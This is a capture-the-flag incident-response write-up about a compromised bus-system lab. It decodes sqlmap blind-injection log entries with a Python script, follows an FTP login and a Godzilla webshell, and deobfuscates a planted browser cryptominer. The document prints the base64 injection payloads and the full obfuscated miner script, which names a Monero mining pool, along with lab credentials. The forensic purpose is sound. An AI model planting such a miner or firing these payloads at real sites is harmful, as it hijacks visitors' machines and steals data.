玄机 (Xuanji)

This round of the industry competition included incident response, so I'm writing this article to record some incident-response knowledge.

It is mostly based on the challenges on 玄机. I have to say, the 玄机 challenges really are expensive!

Incident Response: Bus System Triage

Challenge description:

This environment focuses on traffic analysis, script writing, webshell detection, and obfuscated-code detection (the approach is generic). For learning and reference only.
Copyright: 思而听 (solar incident response), 州弟学安全, 青少年CTF
Environment description:
1. The 思而听 bus system was attacked. The attacker broke in via the web and exfiltrated data, then obtained a private file belonging to one of the driving instructors from the FTP service. After that, the attacker found an arbitrary file upload vulnerability, got a shell, took control of the host, and planted a web-page cryptomining payload. You need to investigate step by step.
Notes:
1. In the captured traffic, FTP port 21 maps to 2121, the SSH port is 2223, and port 80 maps to 8099.
2. Currently open ports: 2223 (SSH), 8099 (WEB)
3. The captured traffic and the corresponding web log are in the root directory after you log in: result.pcap, access.log
4. The SSH password for root is bussec123

Step 1

Analyze the middleware logs in the environment to find the first vulnerability (the one the attacker used to exfiltrate data), then, by analyzing the logs and traffic, use a script to recover the username/password data the attacker obtained. Submit the first two usernames, format: flag{zhangsan-wangli}

The task is mainly to analyze the web middleware logs (Apache/IIS/Nginx). Going into /var/log reveals an apache directory, and its log holds thousands of entries. Looking at a couple of them shows base64-encoded payloads, and the injection is time-based blind. So I had AI write an analysis script to recover the database name, table names, column names, and values extracted by the blind injection.

172.17.0.1 - - [23/Jul/2025:03:16:15 +0000] "GET /search.php?query=KSBBTkQgNTk5NT1DQVNUKChDSFIoMTEzKXx8Q0hSKDk4KXx8Q0hSKDEwNyl8fENIUigxMTMpfHxDSFIoMTEzKSl8fChTRUxFQ1QgKENBU0UgV0hFTiAoNTk5NT01OTk1KSBUSEVOIDEgRUxTRSAwIEVORCkpOjp0ZXh0fHwoQ0hSKDExMyl8fENIUigxMTgpfHxDSFIoMTEyKXx8Q0hSKDExMil8fENIUigxMTMpKSBBUyBOVU1FUklDKSBBTkQgKDM2MTc9MzYxNw%3D%3D HTTP/1.1" 200 1307 "-" "sqlmap/1.9#stable (https://sqlmap.org)"
172.17.0.1 - - [23/Jul/2025:03:16:15 +0000] "GET /search.php?query=IEFORCA1OTk1PUNBU1QoKENIUigxMTMpfHxDSFIoOTgpfHxDSFIoMTA3KXx8Q0hSKDExMyl8fENIUigxMTMpKXx8KFNFTEVDVCAoQ0FTRSBXSEVOICg1OTk1PTU5OTUpIFRIRU4gMSBFTFNFIDAgRU5EKSk6OnRleHR8fChDSFIoMTEzKXx8Q0hSKDExOCl8fENIUigxMTIpfHxDSFIoMTEyKXx8Q0hSKDExMykpIEFTIE5VTUVSSUMp HTTP/1.1" 200 1299 "-" "sqlmap/1.9#stable (https://sqlmap.org)"
172.17.0.1 - - [23/Jul/2025:03:16:15 +0000] "GET /search.php?query=JykgQU5EIDU5OTU9Q0FTVCgoQ0hSKDExMyl8fENIUig5OCl8fENIUigxMDcpfHxDSFIoMTEzKXx8Q0hSKDExMykpfHwoU0VMRUNUIChDQVNFIFdIRU4gKDU5OTU9NTk5NSkgVEhFTiAxIEVMU0UgMCBFTkQpKTo6dGV4dHx8KENIUigxMTMpfHxDSFIoMTE4KXx8Q0hSKDExMil8fENIUigxMTIpfHxDSFIoMTEzKSkgQVMgTlVNRVJJQykgQU5EICgnZFlneSc9J2RZZ3k%3D HTTP/1.1" 200 1310 "-" "sqlmap/1.9#stable (https://sqlmap.org)"
172.17.0.1 - - [23/Jul/2025:03:16:15 +0000] "GET /search.php?query=JyBBTkQgNTk5NT1DQVNUKChDSFIoMTEzKXx8Q0hSKDk4KXx8Q0hSKDEwNyl8fENIUigxMTMpfHxDSFIoMTEzKSl8fChTRUxFQ1QgKENBU0UgV0hFTiAoNTk5NT01OTk1KSBUSEVOIDEgRUxTRSAwIEVORCkpOjp0ZXh0fHwoQ0hSKDExMyl8fENIUigxMTgpfHxDSFIoMTEyKXx8Q0hSKDExMil8fENIUigxMTMpKSBBUyBOVU1FUklDKSBBTkQgJ0l5TnAnPSdJeU5w HTTP/1.1" 200 1309 "-" "sqlmap/1.9#stable (https://sqlmap.org)"
172.17.0.1 - - [23/Jul/2025:03:16:15 +0000] "GET /search.php?query=IEFORCA1OTk1PUNBU1QoKENIUigxMTMpfHxDSFIoOTgpfHxDSFIoMTA3KXx8Q0hSKDExMyl8fENIUigxMTMpKXx8KFNFTEVDVCAoQ0FTRSBXSEVOICg1OTk1PTU5OTUpIFRIRU4gMSBFTFNFIDAgRU5EKSk6OnRleHR8fChDSFIoMTEzKXx8Q0hSKDExOCl8fENIUigxMTIpfHxDSFIoMTEyKXx8Q0hSKDExMykpIEFTIE5VTUVSSUMpLS0gREVITw%3D%3D HTTP/1.1" 200 1302 "-" "sqlmap/1.9#stable (https://sqlmap.org)"
172.17.0.1 - - [23/Jul/2025:03:16:15 +0000] "GET /search.php?query=KSBBTkQgODY5OCBJTiAoU0VMRUNUIChDSEFSKDExMykrQ0hBUig5OCkrQ0hBUigxMDcpK0NIQVIoMTEzKStDSEFSKDExMykrKFNFTEVDVCAoQ0FTRSBXSEVOICg4Njk4PTg2OTgpIFRIRU4gQ0hBUig0OSkgRUxTRSBDSEFSKDQ4KSBFTkQpKStDSEFSKDExMykrQ0hBUigxMTgpK0NIQVIoMTEyKStDSEFSKDExMikrQ0hBUigxMTMpKSkgQU5EICgyMjEyPTIyMTI%3D HTTP/1.1" 200 1295 "-" "sqlmap/1.9#stable (https://sqlmap.org)"
172.17.0.1 - - [23/Jul/2025:03:16:15 +0000] "GET /search.php?query=IEFORCA4Njk4IElOIChTRUxFQ1QgKENIQVIoMTEzKStDSEFSKDk4KStDSEFSKDEwNykrQ0hBUigxMTMpK0NIQVIoMTEzKSsoU0VMRUNUIChDQVNFIFdIRU4gKDg2OTg9ODY5OCkgVEhFTiBDSEFSKDQ5KSBFTFNFIENIQVIoNDgpIEVORCkpK0NIQVIoMTEzKStDSEFSKDExOCkrQ0hBUigxMTIpK0NIQVIoMTEyKStDSEFSKDExMykpKQ%3D%3D HTTP/1.1" 200 1286 "-" "sqlmap/1.9#stable (https://sqlmap.org)"
172.17.0.1 - - [23/Jul/2025:03:16:15 +0000] "GET /search.php?query=JykgQU5EIDg2OTggSU4gKFNFTEVDVCAoQ0hBUigxMTMpK0NIQVIoOTgpK0NIQVIoMTA3KStDSEFSKDExMykrQ0hBUigxMTMpKyhTRUxFQ1QgKENBU0UgV0hFTiAoODY5OD04Njk4KSBUSEVOIENIQVIoNDkpIEVMU0UgQ0hBUig0OCkgRU5EKSkrQ0hBUigxMTMpK0NIQVIoMTE4KStDSEFSKDExMikrQ0hBUigxMTIpK0NIQVIoMTEzKSkpIEFORCAoJ3Z3dksnPSd2d3ZL HTTP/1.1" 200 1299 "-" "sqlmap/1.9#stable (https://sqlmap.org)"
172.17.0.1 - - [23/Jul/2025:03:16:15 +0000] "GET /search.php?query=JyBBTkQgODY5OCBJTiAoU0VMRUNUIChDSEFSKDExMykrQ0hBUig5OCkrQ0hBUigxMDcpK0NIQVIoMTEzKStDSEFSKDExMykrKFNFTEVDVCAoQ0FTRSBXSEVOICg4Njk4PTg2OTgpIFRIRU4gQ0hBUig0OSkgRUxTRSBDSEFSKDQ4KSBFTkQpKStDSEFSKDExMykrQ0hBUigxMTgpK0NIQVIoMTEyKStDSEFSKDExMikrQ0hBUigxMTMpKSkgQU5EICdkcnZ4Jz0nZHJ2eA%3D%3D HTTP/1.1" 200 1297 "-" "sqlmap/1.9#stable (https://sqlmap.org)"
172.17.0.1 - - [23/Jul/2025:03:16:15 +0000] "GET /search.php?query=IEFORCA4Njk4IElOIChTRUxFQ1QgKENIQVIoMTEzKStDSEFSKDk4KStDSEFSKDEwNykrQ0hBUigxMTMpK0NIQVIoMTEzKSsoU0VMRUNUIChDQVNFIFdIRU4gKDg2OTg9ODY5OCkgVEhFTiBDSEFSKDQ5KSBFTFNFIENIQVIoNDgpIEVORCkpK0NIQVIoMTEzKStDSEFSKDExOCkrQ0hBUigxMTIpK0NIQVIoMTEyKStDSEFSKDExMykpKS0tIE9lZ3g%3D HTTP/1.1" 200 1291 "-" "sqlmap/1.9#stable (https://sqlmap.org)"
172.17.0.1 - - [23/Jul/2025:03:16:15 +0000] "GET /search.php?
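Before writing the full script, it's worth sanity-checking the decoding by hand. The `query` parameter is just URL-encoded Base64; decoding the value from the first log line above shows a plain sqlmap boolean-test payload:

```python
import base64
import urllib.parse

# query= value copied from the first access.log line above
encoded = ("KSBBTkQgNTk5NT1DQVNUKChDSFIoMTEzKXx8Q0hSKDk4KXx8Q0hSKDEwNyl8fENIUigxMTMpfHxDSFIoMTEzKSl8fChTRUxFQ1QgKENBU0UgV0hFTiAoNTk5NT01OTk1KSBUSEVOIDEgRUxTRSAwIEVORCkpOjp0ZXh0fHwoQ0hSKDExMyl8fENIUigxMTgpfHxDSFIoMTEyKXx8Q0hSKDExMil8fENIUigxMTMpKSBBUyBOVU1FUklDKSBBTkQgKDM2MTc9MzYxNw%3D%3D")

# URL decode first (to recover the == padding), then Base64 decode
decoded = base64.b64decode(urllib.parse.unquote(encoded)).decode()
print(decoded)  # ") AND 5995=CAST((CHR(113)|| ... "
```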

If this were an offline competition with no internet access, I doubt I could have written this script myself. AI really is impressive. Here it is:

import re
import json
import base64
import urllib.parse
from collections import defaultdict
from datetime import datetime


def decode_payload(encoded_payload):
    """Decode a payload (URL decode + Base64 decode)."""
    try:
        url_decoded = urllib.parse.unquote(encoded_payload)
        try:
            base64_decoded = base64.b64decode(url_decoded).decode('utf-8')
            return base64_decoded
        except Exception:
            return url_decoded
    except Exception:
        return encoded_payload


def parse_apache_log(log_file):
    """Parse the Apache log file."""
    requests = []

    with open(log_file, 'r', encoding='utf-8') as f:
        for line_num, line in enumerate(f, 1):
            line = line.strip()
            if not line or 'sqlmap' not in line:
                continue

            match = re.search(r'"GET\s+([^"]+)"\s+(\d+)\s+(\d+)', line)
            if match:
                url_path = match.group(1)
                status_code = int(match.group(2))
                response_size = int(match.group(3))

                time_match = re.search(r'\[(\d{2}/\w{3}/\d{4}:\d{2}:\d{2}:\d{2})', line)
                timestamp = time_match.group(1) if time_match else ''

                requests.append({
                    'line_num': line_num,
                    'url_path': url_path,
                    'status_code': status_code,
                    'response_size': response_size,
                    'timestamp': timestamp,
                    'raw_line': line
                })

    return requests


def analyze_payload_v3(payload, response_size):
    """Analyze a SQL injection payload - tuned for sqlmap's time-based blind injection."""
    analysis = {
        'type': 'unknown',
        'database': '',
        'table': '',
        'column': '',
        'position': 0,
        'ascii_value': 0,
        'limit_offset': 0,
        'sleep_triggered': False,
        'comparison_operator': '>',
        'record_id': 0
    }

    # SLEEP-trigger detection, corrected against the actual log:
    # delayed responses come back smaller than 1406 bytes
    # (an earlier exact check of == 1346 proved too strict)
    analysis['sleep_triggered'] = response_size < 1406

    # Detect sqlmap's characteristic nested IF structure
    if 'SLEEP(1-(IF(' in payload.upper():
        analysis['type'] = 'time_blind_injection'

        # Pull the pieces out of the ORD(MID(...)) structure
        ord_mid_pattern = r'ORD\(MID\(\(SELECT\s+.*?FROM\s+(\w+)\.(\w+).*?LIMIT\s+(\d+),1\),(\d+),1\)\)([><!]=?)(\d+)'
        match = re.search(ord_mid_pattern, payload, re.IGNORECASE)

        if match:
            analysis['database'] = match.group(1)
            analysis['table'] = match.group(2)
            analysis['limit_offset'] = int(match.group(3))
            analysis['position'] = int(match.group(4))
            analysis['comparison_operator'] = match.group(5)
            analysis['ascii_value'] = int(match.group(6))
            analysis['record_id'] = analysis['limit_offset']

        # Extract the column name
        field_pattern = r'CAST\((\w+)\s+AS'
        field_match = re.search(field_pattern, payload, re.IGNORECASE)
        if field_match:
            analysis['column'] = field_match.group(1)

    return analysis


def reconstruct_character_v3(comparisons):
    """Reconstruct one character from sqlmap's time-blind comparison results."""
    if not comparisons:
        return None

    # sqlmap's logic: SLEEP(1-IF(condition,0,1))
    # If the condition is true it runs SLEEP(0), i.e. no delay;
    # if false, SLEEP(1) delays. A delayed (smaller) response
    # therefore means the condition was false.

    min_val = 32
    max_val = 126

    for comp in sorted(comparisons, key=lambda x: x['ascii_value']):
        ascii_val = comp['ascii_value']
        sleep_triggered = comp['sleep_triggered']
        operator = comp.get('comparison_operator', '>')

        if operator == '!=':
            if sleep_triggered:
                # SLEEP fired, condition false, so char == ascii_val
                return ascii_val
            else:
                # SLEEP did not fire, condition true, so char != ascii_val;
                # rule this value out and keep going
                continue
        if operator == '>':
            if sleep_triggered:
                # SLEEP fired, condition false, so char <= ascii_val
                max_val = min(max_val, ascii_val)
            else:
                # SLEEP did not fire, condition true, so char > ascii_val
                min_val = max(min_val, ascii_val + 1)
        elif operator == '<':
            if sleep_triggered:
                # SLEEP fired, condition false, so char >= ascii_val
                min_val = max(min_val, ascii_val)
            else:
                # SLEEP did not fire, condition true, so char < ascii_val
                max_val = min(max_val, ascii_val - 1)

    # Return the converged value
    if min_val == max_val:
        return min_val
    elif min_val < max_val:
        return min_val
    else:
        return None


def reconstruct_data_v3(payload_analyses):
    """Reconstruct the exfiltrated data - tuned for sqlmap."""
    results = {
        'database': '',
        'tables': [],
        'columns': {},
        'data': {}
    }

    # Collect the per-character extraction info
    data_extractions = defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(list))))

    for analysis in payload_analyses:
        if analysis['type'] == 'time_blind_injection' and analysis['table'] and analysis['column']:
            # Record the basics
            if not results['database']:
                results['database'] = analysis['database']

            table_name = analysis['table']
            if table_name not in results['tables']:
                results['tables'].append(table_name)

            table_key = f"{analysis['database']}.{analysis['table']}"
            column = analysis['column']

            # Record the column structure
            if table_key not in results['columns']:
                results['columns'][table_key] = []
            if column not in results['columns'][table_key]:
                results['columns'][table_key].append(column)

            # Collect the character comparisons
            if analysis['position'] > 0:
                record_id = analysis['record_id']
                position = analysis['position']

                data_extractions[table_key][column][record_id][position].append({
                    'ascii_value': analysis['ascii_value'],
                    'sleep_triggered': analysis['sleep_triggered'],
                    'comparison_operator': analysis['comparison_operator']
                })

    # Rebuild the string data
    for table_key, columns in data_extractions.items():
        results['data'][table_key] = {}

        for column, records in columns.items():
            reconstructed_records = []

            for record_id in sorted(records.keys()):
                positions = records[record_id]

                if positions:
                    max_pos = max(positions.keys())
                    chars = []

                    for pos in range(1, max_pos + 1):
                        if pos in positions:
                            char_code = reconstruct_character_v3(positions[pos])
                            if char_code and 32 <= char_code <= 126:
                                chars.append(chr(char_code))
                            elif char_code == 0:
                                break
                            else:
                                break
                        else:
                            break

                    reconstructed_value = ''.join(chars)
                    if reconstructed_value and len(reconstructed_value) >= 1:
                        reconstructed_records.append({
                            'record_id': record_id,
                            'value': reconstructed_value
                        })

            if reconstructed_records:
                reconstructed_records.sort(key=lambda x: x['record_id'])
                results['data'][table_key][column] = [r['value'] for r in reconstructed_records]

    return results


def main():
    log_file = 'access.log'

    print("Starting SQL time-based blind injection analysis (v3)...")

    # Parse the log file
    print(f"Parsing Apache log file: {log_file}")
    requests = parse_apache_log(log_file)
    print(f"Loaded {len(requests)} relevant log lines")

    if not requests:
        print("No matching SQL injection requests found")
        return

    # Extract and decode the payloads
    print("Extracting HTTP requests...")
    relevant_requests = []

    for req in requests:
        if 'query=' in req['url_path']:
            match = re.search(r'query=([^&\s]+)', req['url_path'])
            if match:
                encoded_payload = match.group(1)
                decoded_payload = decode_payload(encoded_payload)

                req['encoded_payload'] = encoded_payload
                req['decoded_payload'] = decoded_payload
                relevant_requests.append(req)

    print(f"Found {len(relevant_requests)} relevant requests")

    # Analyze the payloads
    print("Decoding and analyzing payloads...")
    payload_analyses = []

    for req in relevant_requests:
        analysis = analyze_payload_v3(req['decoded_payload'], req['response_size'])
        analysis['request'] = req
        payload_analyses.append(analysis)

    # Reconstruct the exfiltrated data
    print("Reconstructing the exfiltrated data...")
    results = reconstruct_data_v3(payload_analyses)

    # Print the report
    print("\n" + "=" * 60)
    print("SQL time-based blind injection analysis report (v3)")
    print("=" * 60)

    if results['database']:
        print(f"\n[+] Target database: {results['database']}")

    if results['tables']:
        print("\n[+] Tables found:")
        for table in results['tables']:
            print(f" - {table}")

    if results['columns']:
        print("\n[+] Column structure found:")
        for table_key, columns in results['columns'].items():
            print(f" {table_key}:")
            for column in columns:
                print(f" - {column}")

    if results['data']:
        print("\n[+] Data successfully extracted:")
        for table_key, columns in results['data'].items():
            print(f" {table_key}:")
            for column, records in columns.items():
                if records:
                    print(f" {column}: {records}")
    else:
        print("\n[-] No concrete data could be extracted")

    # Save the detailed results
    output_data = {
        'results': results,
        'total_requests': len(relevant_requests),
        'analysis_time': datetime.now().isoformat()
    }

    with open('sql_injection_analysis_v3.json', 'w', encoding='utf-8') as f:
        json.dump(output_data, f, indent=2, ensure_ascii=False)

    print("\n[+] Detailed results saved to sql_injection_analysis_v3.json")


if __name__ == '__main__':
    main()
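The heart of the script is the interval narrowing in `reconstruct_character_v3`. To see why the `>` comparisons converge on a single character, here is a small standalone simulation of the same rules (SLEEP fired means the condition was false, so char <= probe; SLEEP silent means char > probe), using the first letter of "sunyue" as the secret:

```python
def bisect_char(secret: int, lo: int = 32, hi: int = 126) -> int:
    """Simulate sqlmap's bisection for one character under the script's rules."""
    while lo < hi:
        probe = (lo + hi) // 2
        # What the server's response delay/size would tell us:
        sleep_fired = not (secret > probe)
        if sleep_fired:
            hi = probe       # condition false: char <= probe
        else:
            lo = probe + 1   # condition true:  char > probe
    return lo

print(chr(bisect_char(ord('s'))))  # s
```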

The output:

{
  "results": {
    "database": "INFORMATION_SCHEMA",
    "tables": [
      "SCHEMATA",
      "TABLES",
      "COLUMNS",
      "bus_drivers"
    ],
    "columns": {
      "INFORMATION_SCHEMA.SCHEMATA": [
        "schema_name"
      ],
      "INFORMATION_SCHEMA.TABLES": [
        "table_name"
      ],
      "INFORMATION_SCHEMA.COLUMNS": [
        "column_name"
      ],
      "bus_system.bus_drivers": [
        "employee_id",
        "full_name",
        "password",
        "username"
      ]
    },
    "data": {
      "INFORMATION_SCHEMA.SCHEMATA": {
        "schema_name": [
          "information_schema",
          "bus_system"
        ]
      },
      "INFORMATION_SCHEMA.TABLES": {
        "table_name": [
          "bus_drivers",
          "news",
          "stops",
          "routes",
          "lost_items",
          "route_stops"
        ]
      },
      "INFORMATION_SCHEMA.COLUMNS": {
        "column_name": [
          "id",
          "eipleyee_ida",
          "full_name",
          "username",
          "qassyqyqa",
          "register_date"
        ]
      },
      "bus_system.bus_drivers": {
        "employee_id": [
          "BJ2024007",
          "BJ2024005",
          "BJ2024016",
          "BJ2024011",
          "BJ2024018",
          "BJ2024014",
          "BJ2024013",
          "BJ2024017",
          "BJ2024002",
          "BJ2024015",
          "BJ2024004",
          "BJ2024010",
          "BJ2024020",
          "BJ2024019",
          "BJ2024012",
          "BJ2024009",
          "BJ2024003",
          "BJ2024001",
          "BJ2024006",
          "BJ2024008"
        ],
        "full_name": [
          " "
        ],
        "password": [
          "888888",
          "Ch@19980808",
          "cy1988",
          "fengjuan88",
          "gx_fly",
          "hmm123456",
          "JX777",
          "kongli000",
          "Lina_666",
          "luyuan@bj",
          "minmin99",
          "password",
          "sgd@top",
          "tianmi_sweet",
          "weiping",
          "wJ_1995",
          "wq2024",
          "zhangwei123",
          "zhaolei_01",
          "zhoupeng2023"
        ],
        "username": [
          "sunyue",
          "chenhao",
          "changyuan",
          "fengjuan",
          "gaoxiang",
          "hanmeimei",
          "jiangxin",
          "kongli",
          "lina",
          "luyuan",
          "liumin",
          "zhengfei",
          "shigandang",
          "tianmi",
          "weiping",
          "wujing",
          "wangqiang",
          "zhangwei",
          "zhaolei",
          "zhoupeng"
        ]
      }
    }
  },
  "total_requests": 5752,
  "analysis_time": "2025-11-30T20:31:09.957102"
}

So the flag to submit is: flag{sunyue-chenhao}

Step 2

Using the harvested usernames and passwords, the attacker exploited password reuse to brute-force the FTP service. Analyze the traffic to find the open FTP port, then find the private file the attacker retrieved after logging in. Submit the file's content, format: flag{xxx}

The challenge says the FTP port is 2121, and FTP response traffic has a telltale string, "successfully". Filter on both:

tcp.port==2121&&tcp contains "successfully"

[Screenshot: Wireshark results for the FTP filter]

Then follow the TCP stream, and the whole exchange becomes visible:

220 (vsFTPd 3.0.3)
USER wangqiang
331 Please specify the password.
PASS wq2024
230 Login successful.
opts utf8 on
200 Always in UTF8 mode.
syst
215 UNIX Type: L8
site help
214 CHMOD UMASK HELP
PWD
257 "/home/wangqiang" is the current directory
TYPE A
200 Switching to ASCII mode.
PASV
227 Entering Passive Mode (192,168,37,4,195,83).
LIST
150 Here comes the directory listing.
226 Directory send OK.
noop
200 NOOP ok.
CWD /home/wangqiang/ftp/
250 Directory successfully changed.
TYPE A
200 Switching to ASCII mode.
PASV
227 Entering Passive Mode (192,168,37,4,195,87).
LIST
150 Here comes the directory listing.
226 Directory send OK.
noop
200 NOOP ok.
CWD /home/wangqiang/ftp/
250 Directory successfully changed.
noop
200 NOOP ok.
CWD /home/wangqiang/ftp/
250 Directory successfully changed.
PWD
257 "/home/wangqiang/ftp" is the current directory
CWD /home/wangqiang/ftp/
250 Directory successfully changed.
TYPE I
200 Switching to Binary mode.
PASV
227 Entering Passive Mode (192,168,37,4,195,85).
SIZE sensitive_credentials.txt
213 62
RETR sensitive_credentials.txt
150 Opening BINARY mode data connection for sensitive_credentials.txt (62 bytes).
226 Transfer complete.
CWD /home/wangqiang/ftp/
250 Directory successfully changed.
noop
200 NOOP ok.
CWD /home/wangqiang/ftp/
250 Directory successfully changed.
PWD
257 "/home/wangqiang/ftp" is the current directory
CWD /home/wangqiang/ftp/
250 Directory successfully changed.
TYPE I
200 Switching to Binary mode.
PASV
227 Entering Passive Mode (192,168,37,4,195,90).
SIZE sensitive_credentials.txt
213 62
RETR sensitive_credentials.txt
150 Opening BINARY mode data connection for sensitive_credentials.txt (62 bytes).
226 Transfer complete.
CWD /home/wangqiang/ftp/
250 Directory successfully changed.
421 Timeout.

A clear interactive FTP session is visible; RETR sensitive_credentials.txt is the command that downloads the file.

The flag is that file's content. From the stream we can tell the file sits in /home/wangqiang/ftp; submit the content.
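A side note on the `227 Entering Passive Mode (...)` replies: the last two numbers encode the FTP data port as p1*256 + p2, which is how you locate the data connection that actually carried sensitive_credentials.txt. A small helper:

```python
import re

def pasv_data_port(reply: str) -> int:
    """Extract the data port from an FTP 227 reply: port = p1*256 + p2."""
    h1, h2, h3, h4, p1, p2 = (int(n) for n in re.findall(r'\d+', reply.split('(')[1]))
    return p1 * 256 + p2

# The 227 reply right before the first RETR of sensitive_credentials.txt:
print(pasv_data_port("227 Entering Passive Mode (192,168,37,4,195,85)"))  # 50005
```

Filtering `tcp.port == 50005` in Wireshark then shows the data stream holding the file's 62 bytes.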

Step 3

The pesky attacker found an arbitrary file upload point. Analyze the logs, the traffic, and the exposed web application to find the file the attacker uploaded, and submit the webshell's password, format: flag{password}

The traffic-analysis tool Zui can present things quite visually:

count() by id.orig_h,status_code,uri | status_code == 200 | sort -r count

[Screenshot: Zui query output, with shell1.php among the URIs]
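If Zui isn't at hand, a similar top-URI tally can be pulled from the access log with standard tools. A minimal sketch (the two-line sample.log here is a stand-in for the real access.log):

```shell
# Count the URIs of requests that returned HTTP 200, most frequent first.
# In the combined log format, $7 is the URI and $9 the status code.
cat > sample.log <<'EOF'
172.17.0.1 - - [23/Jul/2025:03:16:15 +0000] "GET /search.php?query=AAA HTTP/1.1" 200 1307 "-" "sqlmap"
172.17.0.1 - - [23/Jul/2025:03:20:00 +0000] "POST /uploads/shell1.php HTTP/1.1" 200 88 "-" "curl"
EOF
awk '$9 == 200 {print $7}' sample.log | sort | uniq -c | sort -rn
```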

shell1.php stands out as a likely backdoor, and file uploads usually go over POST, so filter in Wireshark and follow the TCP stream to find the webshell:

http.request.method==POST -> Follow TCP Stream

[Screenshot: followed TCP stream showing the uploaded webshell]

flag{woaiwojia}

Step 4

Delete the webshell the attacker uploaded, then read the flag value at /var/flag/1/flag and submit it

Nothing much to say here: go to /var/www/html/public/uploads and delete shell1.php. Presumably there is a check mechanism that, once it sees the file is gone, generates /var/flag/1/flag; just read its content.

Step 5

Analyze the traffic: the attacker planted a web mining script that, in the real world, would consume visitors' resources to mine after they load the page (this environment has been defanged). Submit the file's original name at upload time, format: flag{xxx.xxx}

From step 3 we already saw that the uploaded shell is Godzilla (哥斯拉); the traffic signature is obvious, and both the pass and the key are known. So we can use the tool directly to decrypt the later traffic.

Decrypting stream 7109 shows:

[Screenshot: decrypted Godzilla traffic from stream 7109]

index.php had been deleted there. Continuing to the next streams to see what else was done, stream 7113 shows map.php being moved into /var/www/html/public and renamed to index.php:

[Screenshot: stream 7113, map.php moved to /var/www/html/public and renamed index.php]

Checking the index.php file inside the container, one block of code stands out as suspicious:

<script>
(function(){var _0x1c8d=['fromCharCode','|','4|1|3|0|2','split','log','This\x20will\x20never\x20run','random','floor','now','sqrt','sin','setTimeout','push','shift'];(function(_0x3e1a0f,_0x1c8d8d){var _0x5b3c2d=function(_0x5a1d5c){while(--_0x5a1d5c){_0x3e1a0f['push'](_0x3e1a0f['shift']());}};_0x5b3c2d(++_0x1c8d8d);}(_0x1c8d,0x1f4));var _0x5b3c=function(_0x3e1a0f,_0x1c8d8d){_0x3e1a0f=_0x3e1a0f-0x0;var _0x5b3c2d=_0x1c8d[_0x3e1a0f];return _0x5b3c2d;};var _0x1b8d5c=function(){var _0x5a1d5c=function(){var _0x3c7e4b=!![];return function(_0x1b1f8e,_0x5a1d5c){var _0x3c1a2b=_0x3c7e4b?function(){if(_0x5a1d5c){var _0x1b8d5c=_0x5a1d5c['apply'](_0x1b1f8e,arguments);_0x5a1d5c=null;return _0x1b8d5c;}}:function(){};_0x3c7e4b=![];return _0x3c1a2b;};}();var _0x3c7e4b=_0x1b8d5c(this,function(){var _0x1b1f8e=function(){var _0x5a1d5c;try{_0x5a1d5c=_0x1b8d5c('return\x20(function()\x20'+'{}.constructor(\"return\x20this\")()\x20'+');','');}catch(_0x3c1a2b){_0x5a1d5c=window;}return _0x5a1d5c;};var _0x5a1d5c=_0x1b1f8e();var _0x3c1a2b=_0x5a1d5c['console']=_0x5a1d5c['console']||{};var _0x1b8d5c=[_0x5b3c('0x4'),'warn','info','error','exception','table','trace'];for(var _0x5b3c2d=0x0;_0x5b3c2d<_0x1b8d5c['length'];_0x5b3c2d++){var _0x3c7e4b=_0x1b8d5c['constructor']['prototype']['bind'](_0x1b8d5c);var _0x1b1f8e=_0x1b8d5c[_0x5b3c2d];var _0x5a1d5c=_0x3c1a2b[_0x1b1f8e]||_0x3c7e4b;_0x3c7e4b['__proto__']=_0x1b8d5c['bind'](_0x1b8d5c);_0x3c7e4b['toString']=_0x5a1d5c['toString']['bind'](_0x5a1d5c);_0x3c1a2b[_0x1b1f8e]=_0x3c7e4b;}});_0x3c7e4b();var _0x1b1f8e={};_0x1b1f8e['p']=String[_0x5b3c('0x0')](103,117,108,102,46,109,111,110,101,114,111,111,99,101,97,110,46,115,116,114,101,97,109,58,49,48,49,50,56);_0x1b1f8e['l']=0.8;var _0x5b3c2d=function(){var _0x3c7e4b=_0x5b3c('0x2')[_0x5b3c('0x3')]('|');var _0x1b8d5c=0x0;while(!![]){switch(_0x3c7e4b[_0x1b8d5c++]){case'0':if(Math[_0x5b3c('0x7')](Math[_0x5b3c('0x6')]()*100)>100){console[_0x5b3c('0x4')](_0x5b3c('0x5'));}continue;case'1':while(Date[_0x5b3c('0x8')]()- 
_0x1b8d5c<100*_0x1b1f8e['l']){var _0x5a1d5c=10000;var _0x3c1a2b=0x0;for(var _0x3c7e4b=0x0;_0x3c7e4b<_0x5a1d5c;_0x3c7e4b++){_0x3c1a2b+=Math[_0x5b3c('0x9')](_0x3c7e4b)*Math[_0x5b3c('0xa')](_0x3c7e4b);}}continue;case'2':window[_0x5b3c('0xb')](_0x5b3c2d,100*(1-_0x1b1f8e['l']));continue;case'3':var _0x1b8d5c=Date[_0x5b3c('0x8')]();continue;case'4':continue;}break;}};_0x5b3c2d();}();
</script>

Hand it to AI for analysis:

(function() {
    // Main part of the original code
    var targetServer = String.fromCharCode(103, 117, 108, 102, 46, 109, 111, 110, 101, 114, 111, 111, 99, 101, 97, 110, 46, 115, 116, 114, 101, 97, 109, 58, 49, 48, 49, 50, 56);
    // targetServer = "gulf.moneroocean.stream:10128"

    var loadFactor = 0.8;

    function runMiningScript() {
        var startTime = Date.now();

        // A compute-intensive loop that pins the CPU
        while (Date.now() - startTime < 100 * loadFactor) {
            var iterations = 10000;
            var result = 0;
            for (var i = 0; i < iterations; i++) {
                result += Math.sqrt(i) * Math.sin(i);
            }
        }

        // This condition can never be true, so the branch never runs
        if (Math.floor(Math.random() * 100) > 100) {
            console.log("This will never run");
        }

        // Schedule itself again via a timer
        window.setTimeout(runMiningScript, 100 * (1 - loadFactor));
    }

    // Anti-debugging code - rewrites the console object's methods
    (function() {
        var originalConsole = window.console = window.console || {};
        var methods = ['log', 'warn', 'info', 'error', 'exception', 'table', 'trace'];

        for (var i = 0; i < methods.length; i++) {
            var methodName = methods[i];
            var originalMethod = originalConsole[methodName] || function() {};

            // Wrap the console methods to make debugging harder
            originalConsole[methodName] = (function(name, original) {
                return function() {
                    try {
                        original.apply(this, arguments);
                    } catch (e) {
                        // Swallow errors silently
                    }
                };
            })(methodName, originalMethod);
        }
    })();

    // Start the mining loop
    runMiningScript();
})();

It turns out to be a mining script, so map.php it is.
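As a quick cross-check, the character codes fed to String.fromCharCode in the obfuscated version decode straight to the mining pool address:

```python
# Byte values from the String.fromCharCode(...) call in the obfuscated miner
codes = [103, 117, 108, 102, 46, 109, 111, 110, 101, 114, 111, 111, 99, 101,
         97, 110, 46, 115, 116, 114, 101, 97, 109, 58, 49, 48, 49, 50, 56]
pool = ''.join(map(chr, codes))
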